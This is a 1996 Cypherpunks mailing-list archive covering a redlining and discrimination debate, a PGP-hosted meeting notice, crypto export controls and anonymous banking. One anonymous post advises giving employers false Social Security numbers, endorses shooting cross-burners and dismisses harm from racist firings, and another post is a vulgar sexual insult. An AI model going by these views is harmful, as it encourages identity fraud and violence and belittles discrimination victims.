>give me a general location and Ill start to move my clients there ;-|.

A general location? Hee hee!





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ichudov@algebra.com (Igor Chudov @ home)
Date: Wed, 11 Dec 1996 15:35:05 -0800 (PST)
To: EALLENSMITH@ocelot.Rutgers.EDU (E. Allen Smith)
Subject: Re: Redlining
In-Reply-To: <01ICW62Q119GAEL2GZ@mbcl.rutgers.edu>
Message-ID: <199612112328.RAA02505@manifold.algebra.com>
MIME-Version: 1.0
Content-Type: text


E. Allen Smith wrote:
> 
> From:	IN%"ichudov@algebra.com" 11-DEC-1996 14:01:18.43
> 
> >The problem is, people can choose what credit history they want to have
> >(I can be a saver or a spender, for example), but nobody can change the
> >color of their skin.
> 
> >This is central point of the theory why discrimination based on credit
> >histories is OK, while the discrimination based on race is not.
> 
> 	First, I would point out that redlining does not necessarily
> equal credit discrimination based on race; it may mean credit
> discrimination based on poverty, which has an unfortunately high
> correlation with being a member of some races. (I won't go into the
> explanations for why this is the case here; most people who try to
> explain it don't take enough factors into account.)

Thanks for an interesting reply.

Do we consider discrimination based on poverty illegitimate?

Does the law consider discrimination based on poverty illegitimate?

I think that most people would answer no to both of these questions.

As I said in another letter, correlation, to me, is not an evidence
of discrimination, and just as well, making statements about averages is
not racist or sexist.

It is the cross-section test that evidences discrimination: suppose
we have two large groups with the same credit-related parameters
(credit history, etc). If one group gets better treatment from a
bank, I see a discrimination.

I do not see much problem if the percentage of whites with good credit
is higher than percentage of blacks with good credit: it is a fact of
life.

> 	Second, let's take a look at whether inequalities based on
> factors that people cannot change is something that is wrong. This
> topic is wider in its application than redlining and credit; one
> example important to me in my field is in genetic screening usage for
> insurance purposes. (In that case, you've also got that limits on
> insurance uses of data when individuals can gather the data in
> question mean that someone can predict their own chances of needing
> insurance... leading to those who are healthy not purchasing it,
> and those who aren't purchasing it.)

The crucial question is: do we believe that the characteristic
that we are considering directly linked with future performance?

> 	The first topic to mention in this regard is that of privacy.
> I believe I am among most people in finding a question about my
> behavior (e.g, my sexual activities) significantly more intrusive
> than a question about my personal characteristics (e.g., my gender).
> But I would hope that everyone would agree that it would be idiotic
> and irresponsible not to have someone's payments for insurance vary
> with their behavior; this would encourage irresponsible behavior and
> discourage responsible behavior.
> 	The second topic to mention in this regard is that inequality
> due to factors one cannot change is a fact of life. This is particularly
> true of capitalism (e.g., someone who has a genetic tendency toward
> large size will consume more food and thus spend more money on food),
> but it is also a problem in any other economic system - economics is
> not all of life. Even if one concludes that inequality is wrongful and
> needs to be "alleviated", there are many areas more important than
> credit on which one would logically start... such as forbidding
> merit-based admissions, which are biased in favor of those with higher
> IQs. I trust that my audience sees exactly why this idea, and similar
> ideas, are ultimately nonsense?

This is a valid concern.

> 	The third topic is that one commonly applied idea used by the
> proponents of absolute equality is that found in Rawls' _Theory of
> Justice_, under which the just outcome is said to be found by a group
> of people who do not know what situation they will be in. (This is
> a vast oversimplification of the book(s) in question, which upon
> closer examination may realize the idea I am about to write down.)
> The simplistic conclusion is that everyone will want everything to be

> the same, since any individual might be in a bad or good situation. But
> if you have a choice between 49 dollars and a 50/50 chance of 0 or 100
> dollars, you should take the latter. In other words, a situation in

Not necessarily.


	- Igor.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Dale Thorn <dthorn@gte.net>
Date: Wed, 11 Dec 1996 17:33:08 -0800 (PST)
To: "Matthew J. Miszewski" <mjmiski@execpc.com>
Subject: Re: Redlining
In-Reply-To: <3.0.32.19961211002633.00699be0@execpc.com>
Message-ID: <32AF6000.1D6@gte.net>
MIME-Version: 1.0
Content-Type: text/plain


Matthew J. Miszewski wrote:
> I will not re-quote and rehash the argument thus far.  You do have a knack
> to ignore strong points (although admittedly not all) of your opponent in
> an argument.  Additionally, I am not trying to show anyone that you are a
> "bad person".  I was trying to carry-on civil discourse.  I know you really
> feel that you had no part in disrupting the discourse we started out in, I disagree.

[snip]

> My question was a real one.  The basis of it comes from my work with the
> homeless in which they have a difficult time getting a job because they
> have no "home address" to put on the forms, some do not have or remember
> their SSNs, etc. This causes a cyclic problem for the homeless. My question
> to Tim was, in the real world, how is the protection of this data feasible.

I believe the above paragraph could be the key to why a lot of argument
goes on unnecessarily - an economic model/theory may be a good one, but
is muddied by existing practice/legislation, i.e., the homeless are dis-
advantaged insofar as ID, address, credit and so on, which does not say
so much about the economic model as it does that the model is perturbed
by existing real-world compromises.

[remainder snipped]





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Dave Del Torto <ddt@pgp.com>
Date: Wed, 11 Dec 1996 18:35:05 -0800 (PST)
To: pgp-mime@purpletape.cs.uchicago.edu
Subject: Cypherpunks Dec Mtg / upDate + TEXT-only version
Message-ID: <v03100b00aed4e4e25a04@[204.179.136.87]>
MIME-Version: 1.0
Content-Type: text/plain


Re-Salutations,

For those who can't get to the web page <http://www.pgp.com/961214.html> for one reason or another, the Cypherpunks December 96 Physical Meeting being hosted by PGP Inc is scheduled for:

   Saturday 14 December, 11am-5pm PST.

My apologies for not being specific in the previous SMTP version.

Reminder: _please_ RSVP ASAP as follows: <mailto:ddt@pgp.com?subject=cpunks-mtg-rsvp>
That's a reply to this mail/address with the subject: "cpunks-mtg-rsvp" (no quotes). Thanks to all who've RSVP in compliance with this request so far: I'm no longer worried about being there alone. ;)

Note: since there is a limit to the number of people we can fit in this meeting room (above which the Sofitel will no longer "look the other way"), as soon as we go over 100 RSVP's I'll post a notice (this evening, at this rate). We certainly don't want to discourage anyone from showing up, but be aware that there are physical limits involved, so let us know ASAP.

   dave

PS: Here's a TEXT version of the most up-to-date web content:

................................. cut here .................................

-----BEGIN PGP SIGNED MESSAGE-----

Cypherpunks December 1996 Physical Meeting           [text version]

hosted by Pretty Good Privacy, Inc.

This meeting is being held on United States Soil and is open to the
General Public.

Web URL (includes map): <http://www.pgp.com/961214.html>

________________________________________
Contents:

DATE/TIME
LOCATION
PURPOSE and AGENDA
NOTES
 Please RSVP!
 Demos
 Handouts/Raffle
 PGP Key Exchange
 Meeting Time
 PGP/MIME BOF at the IETF
 PGP Engineers
 Directions to the Meeting
  From the North or East Bay
  From the South Bay

________________________________________
Important Summary Information:

Attendee RSVPs:
  mail to: <ddt@pgp.com>
  subject: cpunks-mtg-rsvp
General info queries
  mail to: <ddt@pgp.com>
  subject: cpunks-mtg-info-request
Agenda proposals
  mail to: <ddt@pgp.com>
  subject: cpunks-mtg-agenda-request
Demo requests
  mail to: <ddt@pgp.com>
  subject: cpunks-mtg-demo-request
 Demo/Agenda item deadline: 11:59pm PST Thursday 12 December 1996

________________________________________
DATE/TIME

	Saturday 14 December 1996
	11am to 5pm PST

________________________________________
LOCATION

	Hotel Sofitel, 223 Twin Dolphin Drive, Redwood Shores, California 94065
	  +1.415.598.9000 main hotel telephone
	Room location: ask at hotel Main Desk or follow "Cypherpunks" signs.

________________________________________
PURPOSE and AGENDA

The Cypherpunks group is an informal, open-membership group dedicated to
various topics on Cryptography and Privacy, and the agenda is determined
by the people who attend. Various software and public-interest issues
may be discussed. The final agenda for the December meeting will be
announced at the meeting based on agenda items submitted by email (see
below).

The Cypherpunks December 96 Physical Meeting is being hosted by Pretty
Good Privacy, Inc in a meeting room at the Hotel Sofitel (see below)
that can accomodate up to 100 people. There will be refreshments/snacks,
and I think this qualifies as a "cypherpunk milestone" of sorts, so we
hope lots of people show up. The meeting has been advertised through
numerous Internet resources and in the print media (SJMN Classified
Notices 12/7 & 12/8).

Please contact me for general information, or to submit an item for the
meeting's agenda. Agenda items must be submitted by email with a brief
textual summary which should specify any computer or AV equipment
needed. The deadline for agenda item requests/proposals is 11:59 PM
Thursday 12 December.

     Dave Del Torto    (December chairperson)
     <ddt@pgp.com>

________________________________________
NOTES

Please RSVP!

Please RSVP if you plan to attend. Tell/bring your friends as well. PGP
Inc has rented a meeting room (plus amenities) that can accomodate up to
100 people for the meeting. Besides the maximum capacity restrictions on
the meeting room (fire codes), it's important that we have an idea of
how many people plan to attend as soon as possible before the meeting,
because we're also arranging for refreshments/snacks (you do not need to
bring anything to eat/drink this time). Thank you for your
consideration.

Demos

If you want to make a Cypherpunks-related presentation or demo
software/etc at the meeting, please notify the chairperson before the
meeting. (ASAP!) Everyone with something to say or show is encouraged to
bring/show it (even stuff that's already been demoed before but which
has been updated).

The cutoff date for demo reservations is also 11:59 PM Thursday 12
December. We can try to have the equipment you might need ready if you
list what you need in detail (and early): otherwise, bring your own
equipment. Though we'll do our best to accomodate everyone, if you wait
until the last minute, there may not be room for you unless you have
something very simple/brief, so please bear that in mind.

There will be overhead projector for transparencies and an RGB projector
for laptops. Net connections (analog modem, ISDN) can be arranged with
enough advance notice. Right now, we have not arranged anything beyond a
Metricom modem (28.8Kbps), but we can arrange an analog modem line or
even an ISDN if there's a specific need. Tell me soon(!).

Handouts/Raffle

Paper handouts are welcome: please give me your stack for the handout
table when you arrive.

There will be door-prizes from PGP, but supplies will be limited if 100
people show up. We will also to raffle off some PGP software (ViaCrypt
stuff, upgradable when our new versions arrive).

PGP Key Exchange

Bring a printout of/screen with your PGP key fingerprint. Or a diskette
version if you want to have it signed (or both). We'll have a "key
exchange moment" at the end of the meeting to faciitate expansion of the
PGP Web of Trust.

Meeting Time

Meeting time is 11 AM to 5 PM. This is slightly earlier than usual for a
Cypherpunks meeting because we have to be out of the meeting room
shortly after 5 PM (so a wedding can be set up), but we can meet in
small informal groups in the hotel lobby/bar after the meeting.

PGP/MIME BOF at the IETF

The IETF's PGP/MIME BOF is the previous morning: Friday 13 Dec,
9:00-11:30 AM (Crystal Room, Fairmont Hotel, 170 South Market St. in
Downtown San Jose, 408.998.1900 main). Remember: it's a "Birds Of a
Feather" session on the last day of the IETF conference (make of that
what you will). Please come by if you want to help support RFC 2015 so
PGP/MIME can take the next step toward IETF Working Group discussion so
we can eventually move it further along the IETF Standards Track. Anyone
who's at the IETF is of course encouraged to stay over until Saturday
and come to the Cypherpunks meeting too!

PGP Engineers

PGP's engineering staff is being encouraged to attend the Cypherpunks
meeting: not to compromise trade secrets or strategic plans, but to
listen to, and/or answer if possible, reasonable
questions/bug-reports/feature requests/etc. Persons interested in
employment opportunities at PGP Inc are also encouraged to attend and
bring a resume/diskette/etc.

Directions to the Meeting

The Sofitel is just off Twin Dolphin Drive a few blocks south of
Oracle's silvery towers (hard to miss). Parking is available in the
hotel's parking structure.

 From the North Bay
(East Bay attendees: first cross the San Mateo Bridge/Hwy 92 west).

	SOUTH on 101 (Bayshore Freeway).
	EXIT at Ralston Ave/Marine Parkway.
	GO EAST on Marine Parkway toward SF Bay (Oracle is on the left).
	RIGHT on Twin Dolphin Drive (2nd light after the overpass)
    Follow Twin Dolphin (curvy) for less than a mile.
	LEFT on Shoreline Drive.
    The Hotel Sofitel is on your left.

 From the South Bay:

	NORTH on 101 (Bayshore Freeway) to Redwood City
	EXIT at Holly Street/Redwood Shores Drive.
	GO EAST on Redwood Shores Drive (toward SF Bay).
	LEFT at Twin Dolphin Drive (2nd traffic light)
    Follow Twin Dolphin (curvy) for less than a mile.
	RIGHT on Shoreline Drive.
    The Hotel Sofitel is on your left.

________________________________________________________________________
Copyright 1996 Pretty Good Privacy, Inc., All Rights Reserved.  PGP,
Pretty Good, and ViaCrypt are registered trademarks of PGP, Inc.  Pretty
Good Privacy is a trademark of PGP, Inc.






-----BEGIN PGP SIGNATURE-----
Version: 2.6.3
Charset: noconv
Comment: Verbum sapienti satis est.

iQCVAwUBMq9fFaHBOF9KrwDlAQHHTwP/Vyv/wrfHJP0DES52RMZbeCxKgd+xK3qm
6/QobqKB8iR/hYWZ0r1qW5TMsz6vlhphVyp5uYEac2yPJ+7GNAMCU8VHK56IshUN
qeZhAWSZF8TCwegIQKWB/CP4yzkj/yHsy0jkWITRk4ghOA+96+W0QZrxHPcRtAGu
LkA1LeupEfw=
=kfOi
-----END PGP SIGNATURE-----






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Timothy C. May" <tcmay@got.net>
Date: Wed, 11 Dec 1996 17:28:19 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: New export controls to include code signing applications
In-Reply-To: <3.0.32.19961211163934.006a08a0@netcom14.netcom.com>
Message-ID: <v03007800aed5107ab512@[207.167.93.63]>
MIME-Version: 1.0
Content-Type: text/plain


At 4:39 PM -0800 12/11/96, Lucky Green wrote:
>It has been speculated in the past that certain crypto schemes, such as
>proposed by Microsoft and Sun, using signed crypto plugins might be helpful
>to the cause for strong crypto if non-US branches of US software companies
>would certify foreign developed crypto software.
>
>According to the recent proposal by Commerce, this will not happen. It will
>be illegal to export the software required to sign the code. So much for
>the government's claim that they make no attempt to limit the export of
>signing-only software.
>
>>From http://www.steptoe.com/commerce.htm
>
>[Listing specific software prohibited from export]
>"c.2. "Software" to certify "software" controlled by 5D002.c.1; "
...

They're really looking desperate, aren't they? They try to limit the export
of crypto software, they try to limit the export of anything with "hooks"
for adding crypto outside the U.S., they try to limit export of crypto
knowledge, and here they're even trying to limit _signing_ software?

What's next? Maybe they'll try to limit the dispensing of _legal advice_ by
U.S. attorneys to foreign clients.

(I keep using the phrase "they try to" becuase obviously few of these
schemes to keep the horses in the barn will work.)

It's looking more and more obvious that crypto development belongs outside
the U.S. (is this observation a controlled item?).

--Tim

Just say "No" to "Big Brother Inside"
We got computers, we're tapping phone lines, I know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^1398269     | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: drose@AZStarNet.com
Date: Wed, 11 Dec 1996 16:52:54 -0800 (PST)
To: Secret Squirrel <nobody@squirrel.owl.de>
Subject: Re: I am a stupid cocksucker
Message-ID: <199612120052.RAA04610@web.azstarnet.com>
MIME-Version: 1.0
Content-Type: text/plain


Secret Squirrel wrote:

>This Christmas Cypherpunks get a special discount: I will
>suck you off for only $5.
>
>Red Rackham
>
>PS: I always sign my posts. I am so stupid.
>PPS: Please killfile me.

Mr Squirrel:

As much as I may appreciate your response to Mr. Rackham's reaction to my
post, in my sole opinion, Dr. Vulis-style epithets do not contribute to
reasonable discourse on this list.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@schloss.li>
Date: Wed, 11 Dec 1996 15:10:45 -0800 (PST)
To: cypherpunks <cypherpunks@toad.com>
Subject: Re: Redlining
In-Reply-To: <199612102104.NAA32212@mailmasher.com>
Message-ID: <Pine.SUN.3.94.961211180751.15195H-100000@polaris>
MIME-Version: 1.0
Content-Type: text/plain


On Tue, 10 Dec 1996, Huge Cajones Remailer wrote:

> >On Tue, 10 Dec 1996, Huge Cajones Remailer wrote:
> >> I believe that ten, or a hundred, or a thousand people should be able
> >> to pool their money and lend it to whomever they please for whatever
> >> reason they like.
> >> 
> >> That, essentially, is what a bank is.  I do not believe the government
> >> should dictate which people you, or your bank, are allowed to lend to.
> >
> >Create a bank where the identity of the customers are unknown and you
> >solve the redlining problem.
> 
> I can imagine a bank whose depositors are not known.  I can also
> imagine a bank which itself operates anonymously.
> 
> How would people borrow money against real estate and remain
> anonymous?  It seems to me that the borrower cannot do so if the real
> estate will act as collateral.

What is to stop deeds from being issued in digital bearer certificates?

> Also, how would an anonymous bank foreclose on a mortgage?

A revocation of the certificate, of course.

Really, you must get a bit more creative.

--
Forward complaints to : European Association of Envelope Manufactures
Finger for Public Key   Gutenbergstrasse 21;Postfach;CH-3001;Bern
Vote Monarchist         Switzerland





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@huge.cajones.com (Huge Cajones Remailer)
Date: Wed, 11 Dec 1996 18:12:32 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: Redlining
Message-ID: <199612120212.SAA19019@mailmasher.com>
MIME-Version: 1.0
Content-Type: text/plain



At 3:14 PM 12/11/1996, Matthew J. Miszewski wrote:
>My point, Red, at the outset was that your tendency to address each point
>in turn was not being fruitful to me (my time is a scarce resource).
>Surely you do not make policy decisions based upon how much time someone
>has to address your concerns...
>
>...This is a good attempt at intellectual honesty which was present
>in your original reply but lacking thereafter.  That aftermath
>explains my tone in my later replies.  I apologize.

You don't have time to explain your beliefs, but you do apparently
have the time to call me an idiot and, now, to tell me that I am
intellectually dishonest.  Since you don't know much about me, the
best you can claim is that I am inconsistent.  I am afraid I cannot
accept an apology which is prefaced by an insult.

When somebody doesn't have time to address my concerns, it does not
have much effect on my thinking.  I will continue to believe as I did
before.  This behaviour is not uncommon.

>>As for the social security number, it has been claimed many times on
>>this list that nobody checks them anyway.  There are programs which
>>generate real-appearing numbers.  (I think one was called
>>"ssn.exe".)
>
>While I understand the greater social good, I, personally, am not
>interested in violating applicable fraud statutes.  This is a
>borderline case in which consideration to the idea, of course, should
>be given.  I would hesitate to expose these people to that risk.

I would not propose committing fraud.  I do not understand who would
be defrauded by giving an employer an incorrect social security
number.  The company pays the salary either way.

>>And, you can go to the SSA to find out somebody's SS number or to have
>>one issued.  It will take awhile.
>
>This is the best way to address the problem.  But, it leads to my original
>quandry (not redlining) which was how some people can, realistically,
>protect this data.  You do give some good opportunities.  For me they are
>unacceptable and on balance, I would suggest that people go the latter
>route and attempt to comply with the statist regulations.  Maybe in a more
>perfect society, they would have an interest in privacy.  In the world
>today, however, I think they would choose to eat.

Giving a false SS number is the fastest way for these people to get
employed and get something to eat.

>If I wanted to I could repeatedly issue heart-wrenching stories of
>poverty in America (similar, of course, to politicians using "real
>world examples" in speeches).  You seem to assume that this would be
>"wrong".

No, this is exactly what I've been asking for.  In fact, I explicitly
suggested that anecdotal evidence based on your experience would have
value.

>I have said, repeatedly, that we disagree.  Apparently, now I have to
>*reiterate* why.

I don't believe I saw it the first time.

>Once again, we disagree.  You do not favor any form of government
>regulation.

I have not stated this.  You have concluded, erroneously, that because
I am opposed to certain regulations, I am opposed to all.

>I do favor some forms of government regulation.  It seems that the
>turning point for you is your belief that racism causes no real harm.
>I disagree.  If you really want to have a list of the harms caused by
>racism, I will list them in a seperate note to you.  I wish you could
>be intellectually honest enough to realize these harms.  I fear,
>however, you will not be.

You are actually objecting to my beliefs, not my honesty.  And, I
don't get the impression that you really understand my beliefs.

In order for failure to get a loan to cause harm, there must be some
sort of expectation that one has a claim on the money being lent.

I do not subscribe to that belief.  I do not understand how my money
suddenly becomes controllable by somebody else because I decide to
lend it.

>>>I, personally, find racial discrimination to be a problem in the
>>>USA.
>>
>>It would be nice if everybody in the U.S. was not a racist.  It
>>would be nice if all the bad people just left.
>
>Actually, it would be preferable if they would become enlightened.
>It is difficult to do.  I try every day.  BTW, if the comment above
>was supposed to be aimed at me, once again i *never* made any such
>assertion.

No, the point I am making is that it should be legal to be unpleasant
so long as you are minding your business.  So, employment
discrimination should be legal, but burning a cross in somebody's lawn
is a shooting offense.  (Preferably on the lawn in question soon after
the defense.)

>>>Not only do I find it a moral problem, but it has adverse effects
>>>on markets and the efficiency of these same markets.  It is costly
>>>not only in personal measures, but in economical terms as well.
>
>>But, of course, I don't subscribe to the notion that market
>>efficiency is the best means of determining policy.  For one thing,
>>concepts such as efficiency and production are politically defined.
>>If I grow food for myself, it does not affect GDP figures.  If I
>>trade the food for money and buy something, then the same production
>>increases GDP.  This is not sensible.
>
>I subscribe to the notion that policy should be determined by the
>best balance of several concerns.  Among these are market efficiency,
>social justice, budget constraint and liberty.  I am unsure how you
>would determine policy.

I think a lot about what is right and wrong.  I am skeptical of
proposals which say "We want to do the right thing and help poor
people, but we want to do it with somebody else's money."

If somebody writes a detailed book arguing that a brutal slave regime
is efficient, I do not say "Maybe if the regime was a little less
brutal, we could still have some efficiency.  We must make tradeoffs."

Rather, I ask how much money we would have to pay somebody to live the
life of a slave.  Suddenly, it doesn't look so "efficient" as it did
before.

This example may appear contrived.  It is not.  A detailed statistical
study of slavery was done in the 1970s.  I believe it was called "Time
on the Cross".  Many people believed that the authors had demonstrated
that slavery was efficient.  The theory was that the slave owners
acted as professional management, seldom exercised brutal punishment,
and that in general everybody was better off, sort of.  (One of the
authors later won a Nobel prize.)

I was taught in school that Irish factory workers and laborers often
had it worse than the slaves because nobody valued their welfare.
(Slaves were quite expensive.)  The example that is given over and
over again, is a canal which was dug with Irish labor because of the
risk of disease from a nearby swamp.

The problem with this model is that there is no evidence of Irish
workers and laborers rushing southward to volunteer to be slaves.  You
would almost think there was something wrong with slavery!

The way I generally think about policy is to consider the preferences
that people have and consider whether they are respected.  I believe
the basis of legitimacy for a government is that it protects people's
rights.

>>More importantly, I don't believe that market efficiency, however
>>measured, is sufficient justification for dictating other people's
>>actions.  "Market efficiency" is a gambit to conceal dictatorial
>>powers in a scientific cloak.
>
>Maybe for some, but if you have assumed that is how I act you are
>mistaken.

What I think is most likely is that, like so many others, you have
accepted terms like "market efficiency" without thinking through
precisely what they mean.

>>Discussions of market efficiency typically overrule the preference
>>that citizens have.  One could imagine that a study that concluded
>>alcohol consumption reduced national efficiency and should therefore
>>be banned.  Yet, this completely fails to take into account the
>>strong preference many people have to drink.  Some even consider it
>>to be a religious sacrament.  I don't believe such preferences
>>should be ignored.  They should be respected.
>
>And neither do I.  On balance, I would not have accepted prohibition
>then, and I do not accept it now.  People also have a preference not
>to hire blacks.  I feel that that should not be an acceptable means
>of interaction between an employer and a prospective employee.  You
>do.  That is what I meant by drawing lines.  You feel that every
>employer (a creation of the state) should have the ability to act in
>a discriminatory fashion. I disagree.

Every employer is a creation of the state?  This certainly explains
why we draw different conclusions.  If I hire some homeless fellow to
dig some post holes and do other work on my property, it is difficult
to understand how the state has created me.

>You and I do agree that when the personal excercise is for a drink,
>the government should not respond.  This is because, on balance, I
>believe that the excercise of that freedom is more important than the
>adverse effects of alcoholism.  And vice versa for employment
>discrimination.

I don't really care how bad alcoholism is.  I certainly don't own
other people and, thus, cannot dictate how they take care of their
bodies, or fail to do so.  Often we see expressions of concern used as
a justification for any degree of control which can be imagined.
While you are opposed to Prohibition, in principle you believe that
your "care" is justification for rather extreme control over the
choices of others.

I generally favor governmental interference when somebody is not being
left alone and is being interfered with in some way by others.  What
causes me to doubt my wisdom is the fact that the government is the
primary instigator of these problems.  As it is today, half of what I
earn is taken away for no good reason and put to no good use.

>>All you have really said is "I believe X."  Should we take your belief
>>on faith or are there reasons which underly your beliefs?
>
>I believe in regulating, in one instance, employment discrimination.
>I do so because I have personally seen the economic impact on the
>Greater Milwaukee Area of such discrimination - both past and
>present.  I believe X also because I have been witness to the
>personal impact that such discrimination has upon people.

This is still too abstract.  What I would be interested in hearing is
specific examples.

>To take advantage of practices effective against poverty, several of
>which you have mentioned, it helps to have self-confidence and a
>degree of self-worth.

What puzzles me is that when I mentioned the failure of poor people to
pursue these beneficial practices you said my comments were "idiotic".
Now you appear to be saying that I was right, but that poor people
lack the self-confidence to do these things.  Please explain.

I suspect you are right, by the way, that poor people lack
self-confidence and fail to really play the game.

>>>Thru painful learning experiences and reality checks - long arguments
>>>over several months and too much coffee - I decided that I would not
>>>want to live in a libertarian's ideal society.  This decision was
>>>based on my perception that it just wouldnt work in reality.
>
>^^^^^^^This was, of course, my explanation before.  Apparently you didnt
>see it.
>I was not using libertarian's ideal society in any derogitive way.  At one
>time I believed in it.  Through self-examination I decided that it
>couldnt work.  Is your point that you disagree with me or that Anyone
>who disagrees with you must be wrong?

I am sorry if I misinterpreted what you meant.  Given that you also
use the phrase "libertarian wet dream", I concluded that "libertarian
ideal society" was also derogatory.

Yes, I generally believe that people who disagree with me are wrong.
If I believed otherwise I would change my mind!  (And sometimes I do.)

>>>>I'm sure many readers of this list have had conversations which
>>>>abruptly end with "Are you a Libertarian?", which is generally
>>>>completely irrelevant to the point under discussion.  What is
>>>>happening is that the other person is more interested in knowing
>>>>your tribal identification than what you believe.  A pity.
>>>
>>>As strange as it may sound to you, most of my conversations go this
>>>way.  It is ironic to me that I have been placed on this side of an
>>>argument.
>>
>>Yet, you are doing something very similar when you raise the issue
>>of "a libertarian's ideal society".  Likewise, you criticized Tim
>>May for having (roughly) "too absolute a theory".  In either case,
>>you are avoiding substantive discussion, preferring to make
>>prejudicial remarks.
>
>Actually that is the substance of my dissention.  I do not believe in
>those theories which results in my favoring X.  You disagree and
>favor an absolute theory of freedom (I may be wrong, but you have
>never asserted your underlying political theory).  My policy
>decisions are based upon my political philosophy.  As are yours, I
>assume.  I never said, Tim was "bad" because of his theory.  I was
>simply pointing out that I did not agree with it.

Saying "I am not a Libertarian" does not tell me much about your
underlying political philosophy.  I would expect to see something
along the lines of "We are a community.  We have obligations to each
other... etc. etc" Of course, I have no idea if that actually is your
theory.

>>One nice thing about Libertarian-style discussions is that most of
>>the policies are separable; that is, we can discuss redlining
>>without discussing highway privatization.  This makes a nice
>>contrast to other styles of discussion in which the proposed scheme
>>only works if everybody participates.  The most extreme example was
>>Marxism where it was claimed that it would fail if the entire world
>>was not Marxist.
>
>You appear here to admit that it is possible to favor one libertarian
>policy while disagreeing with another.  That is what I am doing.

And I have explained, in glorious detail, why I disagree with you.  I
have not said that you are inconsistent because you do not subscribe
to the ideal libertarian society.  I am not sure what such a society
would be.

>>I used the word "forewarned" once.  I said that it would be hard to
>>believe that even wealthy African-Americans were racist in their
>>lending practices.  I still find it hard to believe.
>>
>>It may surprise you to know that I am not all the interested in
>>whether you call yourself a Libertarian.
>
>Doesnt suprise me at all.  You are only interested in your political
>philosophy.  When it is relevant to my political philosophy and the
>way in which I would make policy decisions apprently it is
>irrelevant.  It is not to me.

No, please tell me about your political philosophy.  I am not asking
which political party you vote for - I am more interested in why you
vote for it.

>I believe as I do, that racism harms people.  I do so because of my
>personal experiences.  Among these are employees explaining to me the
>nature of the discrimination that they have suffered, their inability
>to pursue any such claims because of a lack of both self-confidence
>as well as capital, the faces of their children that do not yet
>understand the nature of the world they have been brought into and
>the immense stress on familial relationships caused by the lack of a
>job caused by employment discrimination.

Now this is real progress.  Glad to see it.

>Ill even discard the borderline cases and refer to the slam dunk
>cases out there.  I live and work in Milwaukee, Red.  People are
>fired and told they are fired because they are black.  I have settled
>cases with no dispute of these facts.

I am curious why people hire an African-American person in the first
place if they are just going to fire them later.  That doesn't make
sense to me.  (And, no, I am not being sarcastic, I would like to hear
an explanation.)

>All of the personal harm and more was suffered by my clients.  This
>is part of the reason for my perception.  I wish I lived where you
>did where racism hurts nobody.  Just give me a general location and
>Ill start to move my clients there ;-|.

I think the personal harm is in the minds of your clients.  If you are
fired and your manager says "it's because you're black", this does not
have to be depressing.  It says a lot about the manager and nothing
about the employee at all.  It must be worse to have your manager tell
you that you are a fuck-up and an incompetent and that you can't get
your act together and have to be fired.

The real problem is that a lot of people have accepted some bad ideas.
There is still an idea that there is something wrong with being an
African-American rather than recognizing that, maybe, some unsavory
characters live in the United States.

I also fail to understand why anybody would want to work for a racist,
even if you can force the relationship on the employer.

Red Rackham






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "E. Allen Smith" <EALLENSMITH@ocelot.Rutgers.EDU>
Date: Wed, 11 Dec 1996 15:21:08 -0800 (PST)
To: ichudov@algebra.com
Subject: Re: Redlining
Message-ID: <01ICW62Q119GAEL2GZ@mbcl.rutgers.edu>
MIME-Version: 1.0
Content-Type: text/plain


From:	IN%"ichudov@algebra.com" 11-DEC-1996 14:01:18.43

>The problem is, people can choose what credit history they want to have
>(I can be a saver or a spender, for example), but nobody can change the
>color of their skin.

>This is central point of the theory why discrimination based on credit
>histories is OK, while the discrimination based on race is not.

	First, I would point out that redlining does not necessarily
equal credit discrimination based on race; it may mean credit
discrimination based on poverty, which has an unfortunately high
correlation with being a member of some races. (I won't go into the
explanations for why this is the case here; most people who try to
explain it don't take enough factors into account.)
	Second, let's take a look at whether inequalities based on
factors that people cannot change is something that is wrong. This
topic is wider in its application than redlining and credit; one
example important to me in my field is in genetic screening usage for
insurance purposes. (In that case, you've also got that limits on
insurance uses of data when individuals can gather the data in
question mean that someone can predict their own chances of needing
insurance... leading to those who are healthy not purchasing it,
and those who aren't purchasing it.)
	The first topic to mention in this regard is that of privacy.
I believe I am among most people in finding a question about my
behavior (e.g, my sexual activities) significantly more intrusive
than a question about my personal characteristics (e.g., my gender).
But I would hope that everyone would agree that it would be idiotic
and irresponsible not to have someone's payments for insurance vary
with their behavior; this would encourage irresponsible behavior and
discourage responsible behavior.
	The second topic to mention in this regard is that inequality
due to factors one cannot change is a fact of life. This is particularly
true of capitalism (e.g., someone who has a genetic tendency toward
large size will consume more food and thus spend more money on food),
but it is also a problem in any other economic system - economics is
not all of life. Even if one concludes that inequality is wrongful and
needs to be "alleviated", there are many areas more important than
credit on which one would logically start... such as forbidding
merit-based admissions, which are biased in favor of those with higher
IQs. I trust that my audience sees exactly why this idea, and similar
ideas, are ultimately nonsense?
	The third topic is that one commonly applied idea used by the
proponents of absolute equality is that found in Rawls' _Theory of
Justice_, under which the just outcome is said to be found by a group
of people who do not know what situation they will be in. (This is
a vast oversimplification of the book(s) in question, which upon
closer examination may realize the idea I am about to write down.)
The simplistic conclusion is that everyone will want everything to be
the same, since any individual might be in a bad or good situation. But
if you have a choice between 49 dollars and a 50/50 chance of 0 or 100
dollars, you should take the latter. In other words, a situation in
which inequalities exist can still be one that is overall better than
a fully equal situation. There are a number of respects in which
the insurance and credit markets fall under this category. The most
obvious is the direct cost of regulation. Less obvious but perhaps
more important is the uncertainty factor; the use of more data (for
an insurance or credit decision) leads to less uncertainty in
the ultimate outcome, and thus to less risk of unexpected claims
